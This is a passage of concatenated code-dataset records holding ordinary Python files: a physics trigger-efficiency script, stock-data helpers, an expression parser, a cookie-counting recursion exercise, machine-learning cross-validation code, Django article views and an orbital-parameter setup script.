x.axes()][0]==var1_name):\n den_arr = np.transpose(den_arr)\n num_arr = np.transpose(num_arr)\n\n den_arr[:][1] = den_arr[:][1] + den_arr[:][0]\n den_arr[:][-2] = den_arr[:][-2] + den_arr[:][-1]\n num_arr[:][1] = num_arr[:][1] + num_arr[:][0]\n num_arr[:][-2] = num_arr[:][-2] + num_arr[:][-1]\n\n den_arr[1][:] = den_arr[1][:] + den_arr[0][:]\n den_arr[-2][:] = den_arr[-2][:] + den_arr[-1][:]\n num_arr[1][:] = num_arr[1][:] + num_arr[0][:]\n num_arr[-2][:] = num_arr[-2][:] + num_arr[-1][:]\n\n den_arr = np.delete(den_arr,-1,0)\n den_arr = np.delete(den_arr,0,0)\n den_arr = np.delete(den_arr,-1,1)\n den_arr = np.delete(den_arr,0,1)\n num_arr = np.delete(num_arr,-1,0)\n num_arr = np.delete(num_arr,0,0)\n num_arr = np.delete(num_arr,-1,1)\n num_arr = np.delete(num_arr,0,1)\n\n print(num_arr)\n print(den_arr)\n print(x_bins)\n print(y_bins)\n\n eff_range_arr = hist.clopper_pearson_interval(num_arr, den_arr)\n\n return np.transpose(np.divide(num_arr,den_arr, out=np.zeros_like(num_arr), where=den_arr!=0)),x_bins,y_bins,np.transpose(eff_range_arr,[0,2,1])\n\ndef getHists(filename_data,filename_mc,hadel_w,hadmu_w,hadhad_w):\n\n eff_hists_data = {}\n eff_hists_mc = {}\n eff_hists_data_int = {}\n eff_hists_mc_int = {}\n x_bins = {}\n y_bins = {}\n chan_w = {'hadhad':hadhad_w,'hadel':hadel_w,'hadmu':hadmu_w}\n\n for chan in chanlist:\n h_trig = None\n for f_d in filename_data:\n # open hists\n hists_unmapped_data = load('%s.coffea'%f_d)\n \n # map to hists\n for key in hists_unmapped_data:\n if (key==histnames[chan]):\n if not h_trig:\n h_trig = hists_unmapped_data[key]\n else:\n h_trig = h_trig + hists_unmapped_data[key]\n \n print(f_d)\n eff_hists_data[chan],_,_,eff_hists_data_int[chan] = getTrigEff(h_trig,var1names[chan],var2names[chan],varcuts_data[chan],numsels[chan],rebin1[chan],rebin2[chan])\n #drawTrigEff(h_trig,args.var1name,args.var1label,args.var2name,args.var2label,vars_cuts,num_sels,args.title,args.label)\n\n h_trig = None\n if (len(chan_w[chan]) != len(filename_mc)):\n chan_w[chan] = [1. for f in filename_mc]\n for i,f_m in enumerate(filename_mc):\n # open hists\n hists_unmapped_mc = load('%s.coffea'%f_m)\n\n # map to hists\n for key in hists_unmapped_mc:\n if (key==histnames[chan]):\n if (chan_w[chan][i] != 1.): \n hists_unmapped_mc[key].scale(chan_w[chan][i])\n if not h_trig:\n h_trig = hists_unmapped_mc[key]\n else:\n h_trig = h_trig + hists_unmapped_mc[key]\n \n print(f_m)\n eff_hists_mc[chan],x_bins[chan],y_bins[chan],eff_hists_mc_int[chan] = getTrigEff(h_trig,var1names[chan],var2names[chan],varcuts_mc[chan],numsels[chan],rebin1[chan],rebin2[chan])\n #drawTrigEff(h_trig,args.var1name,args.var1label,args.var2name,args.var2label,vars_cuts,num_sels,args.title,args.label)\n\n return eff_hists_data,eff_hists_mc,x_bins,y_bins,eff_hists_data_int,eff_hists_mc_int\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--hists_data', dest='hists_data', default=\"hists_data\", help=\"hists pickle name (data)\", nargs='+')\n parser.add_argument('--hists_mc', dest='hists_mc', default=\"hists_mc\", help=\"hists pickle name (MC)\", nargs='+')\n parser.add_argument('--hadel_w', dest='hadel_w', default=[1.], help=\"HadEl File Weights (MC)\", nargs='+', type=float)\n parser.add_argument('--hadmu_w', dest='hadmu_w', default=[1.], help=\"HadMu File Weights (MC)\", nargs='+', type=float)\n parser.add_argument('--hadhad_w', dest='hadhad_w', default=[1.], help=\"HadHad File Weights (MC)\", nargs='+', type=float)\n #parser.add_argument('--histname', dest='histname', default=\"trigeff\", help=\"hist name\")\n parser.add_argument('--tag', dest='tag', default=\"trig_sf_debug\", help=\"tag\")\n parser.add_argument('--output', dest='output', default=\"../boostedhiggs/data/trig_sf_corr\", help=\"output\")\n parser.add_argument('--year', dest='year', default=\"2017\", help=\"year\")\n #parser.add_argument('--varname', dest='varname', default=\"\", help=\"varname\")\n #parser.add_argument('--varlabel', dest='varlabel', default=\"\", help=\"varlabel\")\n #parser.add_argument('--varcuts', dest='varcuts', default=\"\", help=\"varcuts\", nargs='+')\n #parser.add_argument('--numsel', dest='numsel', default=\"\", help=\"numsel\", nargs='+')\n #parser.add_argument('--title', dest='title', default=\"\", help=\"title\")\n #parser.add_argument('--label', dest='label', default=\"\", help=\"label\")\n args = parser.parse_args()\n\n #python make_trig_eff.py --hists_data ../condor/May27_Trig/hists_trig_Run2017CDEF --hists_mc ../condor/May27_Trig/hists_trig_QCD\n\n eff_hists_data,eff_hists_mc,x_bins,y_bins,eff_hists_data_int,eff_hists_mc_int = getHists(args.hists_data,args.hists_mc,args.hadel_w,args.hadmu_w,args.hadhad_w)\n\n h_trig_sf = {}\n arr_sf = {}\n arr_sf_up = {}\n arr_sf_down = {}\n h_trig_eff_mc = {}\n h_trig_eff_data = {}\n for chan in chanlist:\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"] = hist.Hist(\"Trigger Scale Factor (%s) Nominal\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"] = hist.Hist(\"Trigger Scale Factor (%s) Up\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"] = hist.Hist(\"Trigger Scale Factor (%s) Down\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_eff_mc[chan] = hist.Hist(\"Trigger Efficiency, MC (%s)\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_eff_data[chan] = hist.Hist(\"Trigger Efficiency, Data (%s)\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n inputs = {}\n inputs_up = {}\n inputs_down = {}\n inputs_mc = {}\n inputs_data = {}\n inputs[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_up[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_up[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_down[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_down[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_mc[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_mc[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_data[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_data[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs[\"weight\"] = np.divide(eff_hists_data[chan],eff_hists_mc[chan],out=np.ones_like(eff_hists_data[chan]), where=eff_hists_mc[chan]!=0.).flatten()\n inputs_up[\"weight\"] = np.divide(eff_hists_data_int[chan][1],eff_hists_mc_int[chan][0],out=np.ones_like(eff_hists_data_int[chan][1]), where=eff_hists_mc_int[chan][0]!=0.).flatten()\n inputs_down[\"weight\"] = np.divide(eff_hists_data_int[chan][0],eff_hists_mc_int[chan][1],out=np.ones_like(eff_hists_data_int[chan][0]), where=eff_hists_mc_int[chan][1]!=0.).flatten()\n arr_sf[chan] = inputs[\"weight\"]\n arr_sf_up[chan] = inputs_up[\"weight\"]\n arr_sf_down[chan] = inputs_down[\"weight\"]\n inputs_mc[\"weight\"] = eff_hists_mc[chan].flatten()\n inputs_data[\"weight\"] = eff_hists_data[chan].flatten()\n \n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"].fill(**inputs)\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"].fill(**inputs_up)\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"].fill(**inputs_down)\n h_trig_eff_mc[chan].fill(**inputs_mc)\n h_trig_eff_data[chan].fill(**inputs_data)\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc[chan][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf_up[chan]-arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc_int[chan][0][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_up_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf_down[chan]-arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc_int[chan][1][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_sf_debug_down_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_eff_data[chan],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(eff_hists_data[chan][j,i]) if eff_hists_data[chan][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_eff_data_debug_%s.pdf\"%(args.tag,chan))\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_eff_mc[chan],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(eff_hists_mc[chan][j,i]) if eff_hists_mc[chan][j,i]>0. else \"\",\n color=\"k\", ha=\"center\", va=\"center\")#, fontweight=\"bold\")\n \n fig.savefig(\"%s/trig_eff_mc_debug_%s.pdf\"%(args.tag,chan))\n \n print(h_trig_sf)\n save(h_trig_sf,\"%s_%s.coffea\"%(args.output,args.year))\n","sub_path":"test/make_trig_eff.py","file_name":"make_trig_eff.py","file_ext":"py","file_size_in_byte":18869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"242815031","text":"import pandas as pd\nimport numpy as np\nimport quandl\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport datetime\nfrom stockstats import StockDataFrame\n\ndirectory = \"stock_data\"\n\ndef download_data(stocks, usestockstats=True):\n # if directory does not exist, create & download the data\n stock_items = list()\n #stock_items = [\"WIKI/INTC\", \"WIKI/QCOM\", \"WIKI/NVDA\", \"WIKI/TXN\", \"WIKI/BRCM\", \"WIKI/AAPL\"]\n for item in stocks:\n stock_items += [\"WIKI/\"+item]\n if not os.path.exists(directory):\n os.makedirs(directory)\n for item in stock_items:\n fileName = os.path.join(directory, item[5:]+\".csv\")\n if os.path.exists(fileName):\n continue\n data = quandl.get(item)\n final_data = data.copy()\n if (usestockstats == True):\n stock_df = StockDataFrame.retype(data)\n final_data['RSI'] = stock_df['rsi_14']\n final_data['StocOsci'] = stock_df['kdjj']\n final_data['ADMI'] = stock_df['adx']\n final_data['VVR'] = stock_df['vr']\n final_data['SMA'] = stock_df['adj. close_14_sma']\n \n with open(fileName, 'w+') as f:\n final_data.to_csv(f)\n\ndef get_stocks_df_by_column(stocks, columnName = 'Adj. Close', dateFrom = '2006-01-01'):\n stock_info_df = pd.DataFrame()\n for stock_id in stocks:\n fileName = os.path.join(directory, stock_id +\".csv\")\n if not os.path.exists(fileName):\n print(\"get_stocks_dataframe: Missing {} data\".format(stock_id))\n continue\n stock_dat = pd.read_csv(fileName, index_col= [0], header=0, parse_dates=[1])\n frame = stock_dat[[columnName]]\n frame.columns = [stock_id]\n stock_info_df = pd.concat([stock_info_df, frame], axis=1)\n\n info = stock_info_df.loc[dateFrom:]\n return info\n\ndef get_stock_dataframe(stockName, dateFrom = '2006-01-01'):\n fileName = os.path.join(directory, stockName + \".csv\")\n stock_data = pd.read_csv(fileName, index_col= [0], header=0, parse_dates=[1])\n stock_data['Open'] = stock_data.Open.astype(float)\n stock_data.drop(['Ex-Dividend', 'Split Ratio', 'Open', 'High', 'Close', 'Low', 'Volume'], axis=1, inplace=True)\n return stock_data.loc[dateFrom:]\n\ndef get_datetime_from_str(date_str):\n return datetime.datetime.strptime(date_str, '%Y-%m-%d')\n\ndef get_gap_in_months(start_date, end_date):\n return (end_date.year - start_date.year) * 12 + end_date.month - start_date.month\n\ndef plot_graph(ax, test_dates, prediction, actual, title=\"Title goes here\"):\n print(\"Test dates start {} end {}\".format(test_dates[0], test_dates[-1]))\n start_date = get_datetime_from_str(test_dates[0])\n end_date = get_datetime_from_str(test_dates[-1])\n num_months = get_gap_in_months(start_date, end_date)\n #print(num_months)\n\n ax.set_title(title)\n ax.set_xticklabels('')\n #ax.set_xticks([datetime.date(start_year+int(i/12),1+i%12,1) for i in range(num_months)])\n ax.set_xticks([datetime.date(start_date.year+int(i),1,1) for i in range(1+int(num_months/12))])\n ax.set_xticklabels([datetime.date(start_date.year+int(i),1,1).strftime('%Y') for i in range(1+int(num_months/12)+1)])\n ax.plot(test_dates.astype(datetime.datetime), prediction, 'r-', label = 'predicted')\n ax.plot(test_dates.astype(datetime.datetime), actual, 'g-.', label = 'actual')\n ax.legend(loc='upper right', shadow=True).get_frame().set_facecolor('0.8')\n","sub_path":"capstone_support.py","file_name":"capstone_support.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563748332","text":"\"\"\"Lovelace04_PartC.py\"\"\"\r\n\"\"\"Licensed Under the MIT License: CHECK IN REPO: https://github.com/Rongmario/FoP-T1-Assignment-2020\"\"\"\r\n\r\n__author__ = \"Rongmario\"\r\n\r\ndef main(expression: str): # Expects user's input in the function (string)\r\n if len(expression) == 0:\r\n return \"Empty string.\" # Output when user's input is empty\r\n first = expression[0]\r\n splits, signs = [first], {'+', '-', '*'} # Use tuple unpacking to assign variables\r\n if not first.isdigit() or not expression[-1].isdigit():\r\n return \"Invalid expression.\" # Output when first character is anything other than a number\r\n for i in expression[1:]: # Start the loop from second character\r\n if i.isdigit():\r\n if splits[-1] == '*':\r\n splits.append(i) # When last index of list is *, we append new element\r\n else:\r\n splits[-1] += i # If current character is a digit, add it onto the last element of list\r\n elif i in signs:\r\n if splits[-1] in signs:\r\n return \"Invalid expression.\" # Not allowed signs to be next to each other\r\n else:\r\n splits.append(i) # If current character is any of the signs, we append a new element onto the list\r\n else:\r\n return \"Invalid expression.\"\r\n j = 0 # Counter\r\n while j < len(splits):\r\n if splits[j] == '*':\r\n splits[j - 1] = int(splits[j - 1]) * int(splits[j + 1]) # Multiply left, right hand of the multiply index\r\n del splits[j: j + 2] # Delete multiply index and right hand index, result is stored on left hand\r\n else:\r\n j += 1 # Otherwise increment counter if no multiply sign is found\r\n # Sum of all elements in the list, we use list comprehension here to convert all elements with type 'str' to 'int'\r\n return sum([int(x) for x in splits])\r\n\r\n\r\nuser_input = input(\"Please enter an arithmetic expression: \")\r\nresult = main(user_input)\r\nif type(result) == int:\r\n # Format is used here so I can put a full-stop straight after the variable without having a space dividing it\r\n print(\"The result is {0}.\\nGoodbye.\".format(result))\r\nelse:\r\n print(result)\r\n","sub_path":"Lovelace04_PartC.py","file_name":"Lovelace04_PartC.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41352494","text":"'''\nInput: an integer\nReturns: an integer\n'''\ndef eating_cookies(n):\n if n < 0:\n return 0\n if n == 0:\n return 1\n\n else:\n return eating_cookies(n-1) + eating_cookies(n-2) + eating_cookies(n-3)\nif __name__ == \"__main__\":\n # Use the main function here to test out your implementation\n num_cookies = 5\n\n print(f\"There are {eating_cookies(num_cookies)} ways for Cookie Monster to each {num_cookies} cookies\")\n\n\n# UPER\n\n## Understand, Plan, Execute , Reflect\n\n\"\"\"\n# given a number\n# how many ways can you reach 0 from that number\n\n# example : given 3\n# (given 3) - 1 - 1 - 1 = 0\n# (given 3) - 2 - 1 = 0\n# (given 3) - 1 - 2 = 0\n# (given 3) - 3 = 0\n# you can reach 0 in 4 ways given 3\n\n### To Understand\n# Re-phrase the problem.\n\"\"\"\n\n# Make sure to fully grasp what is being asked\n# If you understand what success looks like, you understand the problem\n\n\n### To Plan\n# Gather info nonstop\n# get rid of repeat info \n\"\"\"\nThis question is asking for permutations.\n\nGiven a number (n)\n\n\n\"\"\"\n### Execute\n# Execute the plan!\n\n### Reflect on the results of the execution\n\n\n","sub_path":"eating_cookies/eating_cookies.py","file_name":"eating_cookies.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"196416466","text":"import numpy as np\nimport torch\n\n\nclass Rings:\n def __init__(self, n_mixtures, ring_radius=10, std=1., device=\"cpu\", seed=2019):\n self.n_mixtures = n_mixtures\n self.ring_radius = ring_radius\n self.std = std\n self.device = torch.device(device)\n torch.manual_seed(seed)\n\n self.centers_x = []\n self.centers_y = []\n delta_theta = 2 * np.pi / self.n_mixtures\n for i in range(self.n_mixtures):\n self.centers_x.append(10 * np.cos(i * delta_theta))\n self.centers_y.append(10 * np.sin(i * delta_theta))\n self.centers_x = np.expand_dims(np.array(self.centers_x), 1)\n self.centers_y = np.expand_dims(np.array(self.centers_y), 1)\n self.centers = np.concatenate([self.centers_x, self.centers_y], 1)\n\n self.centers = torch.from_numpy(self.centers)\n self.p = torch.full(size=(self.n_mixtures,), fill_value=(1./self.n_mixtures), device=self.device)\n\n def get_sample(self, size):\n ith_center = torch.multinomial(self.p, num_samples=size, replacement=True)\n sample_centers = self.centers[ith_center, :]\n std = torch.full_like(sample_centers, self.std)\n sample_points = torch.normal(mean=sample_centers, std=std).to(self.device, dtype=torch.float)\n return sample_points\n\n def get_test(self):\n return self.get_sample(10000)\n","sub_path":"__archived/dataloader/rings.py","file_name":"rings.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"128799045","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import tree\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\nimport graphviz \n\n\n\nfilename = 'h2p5data.csv'\ndata = pd.read_csv(filename)\nrow_index = data.index.tolist()\nfeature_list = list(data)[1:-1]\n\nfolders = []\nfor i in range(1, 6):\n temp = []\n for j in row_index:\n #print(j)\n Id = j + 1\n if Id % 5 == i-1:\n temp.append(j)\n\n folders.append(temp)\n\n\nprint(\"5-fold CV Result of Naive Bayes Classifier:\")\n\nNB_actual_class = []\nNB_predicted_class = []\nfor idx, folder in enumerate(folders):\n folderID = idx + 1\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n gnb = GaussianNB()\n for i in row_index:\n if i not in folder:\n x_train.append(data.loc[row_index[i], feature_list])\n y_train.append(data.loc[row_index[i], 'Class'])\n else:\n x_test.append(data.loc[row_index[i], feature_list])\n y_test.append(data.loc[row_index[i], 'Class'])\n\n model = gnb.fit(x_train, y_train)\n y_pred = model.predict(x_test)\n NB_actual_class.extend(y_test)\n NB_predicted_class.extend(y_pred)\n print(\"---Print Probabilities---\")\n print(model.predict_proba(x_test))\n \n\nDT_actual_class = []\nDT_predicted_class = []\nfor idx, folder in enumerate(folders):\n folderID = idx + 1\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n clf = tree.DecisionTreeClassifier()\n for i in row_index:\n if i not in folder:\n x_train.append(data.loc[row_index[i], feature_list])\n y_train.append(data.loc[row_index[i], 'Class'])\n else:\n x_test.append(data.loc[row_index[i], feature_list])\n y_test.append(data.loc[row_index[i], 'Class'])\n\n model = clf.fit(x_train, y_train)\n y_pred = model.predict(x_test)\n DT_actual_class.extend(y_test)\n DT_predicted_class.extend(y_pred)\n #Visualize\n dot_data = tree.export_graphviz(clf, out_file=None, \n feature_names=feature_list, \n class_names=target_names, \n filled=True, rounded=True, \n special_characters=True) \n graph = graphviz.Source(dot_data) \n print(\"--Tree--\")\n print(\"See Tree\"+str(idx)+\".pdf\")\n graph.render(\"Tree\"+str(idx))\n \n \n#NB Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(NB_actual_class, NB_predicted_class, labels=[1, 0]))\n#yes = 1; no = 0\ntarget_names = ['1','0']\nprint(classification_report(NB_actual_class, NB_predicted_class, target_names=target_names))\nprint(\"NB Accuracy: \")\nprint(accuracy_score(NB_actual_class, NB_predicted_class))\n\n\n\nprint(\"5-fold CV Result of Decision Tree Classifier:\")\n#DT Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(DT_actual_class, DT_predicted_class, labels=[1, 0]))\ntarget_names = ['1','0']\nprint(classification_report(DT_actual_class, DT_predicted_class, target_names=target_names))\nprint(\"DT Accuracy: \")\nprint(accuracy_score(DT_actual_class, DT_predicted_class))\n\n\n# Final Training on the whole dataset\nprint(\"Final Training on the whole dataset\")\n\nfilename = 'h2p5data.csv'\ndata = pd.read_csv(filename)\nx_data = []\ny_data = []\n\ngnb2 = GaussianNB()\n \nx_data = data.loc[:, feature_list]\ny_data = data.loc[:, 'Class']\n \nmodel = gnb2.fit(x_data, y_data)\n\n\nfinal_predicted_class = model.predict(x_data)\nfinal_actual_class = y_data \n \n#NB Metrics\nprint(\"confusion_matrix\")\nprint(confusion_matrix(final_actual_class, final_predicted_class, labels=[1, 0]))\ntarget_names = ['1','0']\nprint(classification_report(final_actual_class, final_predicted_class, target_names=target_names))\nprint(\"Accuracy: \")\nprint(accuracy_score(final_actual_class, final_predicted_class))\nprint(\"---Print Probabilities---\")\nprint(model.predict_proba(x_data))","sub_path":"hw2p5.py","file_name":"hw2p5.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22136459","text":"from django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom articlemanager.forms import ItemTypeForm\nfrom base.models import ItemType\n\n\n@login_required\ndef overview(request):\n items = ItemType.objects.all()\n return render(request, \"overview.html\", locals())\n\n\n@login_required\ndef update(request, article_id):\n item = get_object_or_404(ItemType, pk=article_id)\n items = ItemType.objects.all()\n\n if request.method == 'POST':\n form = ItemTypeForm(request.POST, instance=item)\n\n if form.is_valid():\n item = form.save()\n return HttpResponseRedirect('/articles/{id}'.format(id=item.id))\n else:\n form = ItemTypeForm(instance=item)\n\n return render(request, \"update.html\", locals())\n\n\n@login_required\ndef delete(request, article_id):\n item = get_object_or_404(ItemType, pk=article_id)\n item.delete()\n\n return HttpResponseRedirect('/articles/')\n\n\n@login_required\ndef create(request):\n items = ItemType.objects.all()\n\n if request.method == 'POST':\n form = ItemTypeForm(request.POST)\n if form.is_valid():\n item = form.save()\n return HttpResponseRedirect('/articles/{id}'.format(id=item.id))\n else:\n form = ItemTypeForm()\n\n return render(request, \"create.html\", locals())","sub_path":"articlemanager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619397287","text":"import os\nimport sys\nimport math\nimport matplotlib.pyplot as pl\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport time as tm\nimport random\nfrom functions import *\nfrom constants import *\n'''\nParameters needed: \nma, mb, mp, radius_a, radius_b, radius_p, a_s, a_p, per_s, per_p, \ne_s, e_p, i_s, i_p, Omega_s, Omega_p, w_s, w_p, M0_s, M0_p\n\nOmega_s = 0\nParameters to generate: \nmu, radius_a, radius_b, radius_p, a_s, e_s, e_p, i_s, i_p, Omega_p, w_s, w_p, M0_s, M0_p\n\nOther parameters to specify: \nn_periods, res, tol\n\nmu: [0,0.5]\nradius_a (Rsun): [,]\nradius_b (Rsun): [,]\nradius_p (Rjup): [0.25,1.05]\na_s (AU): [0.0836,0.22882]\ne_s: [0.023,0.521]\ne_p: [0.007,0.411]\ni_s (deg): [87,93]\ni_p (deg): [87,93]\nOmega_p (deg): [-2,2]\nw_s (deg): [,]\nw_p (deg): [,]\nM0_s (deg): [0,360]\nM0_p (deg): [0,360]\n'''\ndef datain(grid=10):\n\tmass_a = np.linspace(0.6897, 1.47, grid)\n\tmass_b = np.linspace(0.1951, 1.0208, grid)\n\tradius_a = np.linspace(0.6489, 1.79, grid)\n\tradius_b = np.linspace(0.2143, 1.0927, grid)\n\tradius_p = np.linspace(0.25, 1.05, grid)\n\ta_s = np.linspace(0.0836, 0.22882, grid)\n\te_s = np.linspace(0.023,0.521,grid)\n\te_p = np.linspace(0.007,0.411,grid)\n\ti_s = np.linspace(87,93,grid)\n\ti_p = np.linspace(87,93,grid)\n\tOmega_p = np.linspace(-2,2,grid)\n\tw_s = np.linspace(0,359,grid)\n\tw_p = np.linspace(0,359,grid)\n\tM0_s = np.linspace(0,359,grid)\n\tM0_p = np.linspace(0,359,grid)\n\n\tmass_a *= MSUN_KG\n\tmass_b *= MSUN_KG\n\tradius_a *= RSUN_M\n\tradius_b *= RSUN_M\n\tradius_p *= RJUPITER_M\n\ta_s *= AU_M\n\ti_s *= math.pi/180\n\ti_p *= math.pi/180\n\tOmega_p *= math.pi/180\n\tw_s *= math.pi/180\n\tw_p *= math.pi/180\n\tM0_s *= math.pi/180\n\tM0_p *= math.pi/180\n\tdata_out = (mass_a, mass_b, radius_a, radius_b, radius_p, a_s, e_s, e_p, i_s, i_p, Omega_p, w_s, w_p, M0_s, M0_p)\n\treturn data_out\n\ngrid = 10\ndata = datain(grid)\nprint(data)\nx=0\nfor i in range (0,10):\n\tprint(x)","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"524903384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n\nclass FoodClassifier:\n #Class Attributes:\n #model - the underlying keras model\n #labels - the labels to be associated with the activation of each output neuron. \n #Labels must be the same size as the output layer of the neural network. \n \n \n def __init__(self, 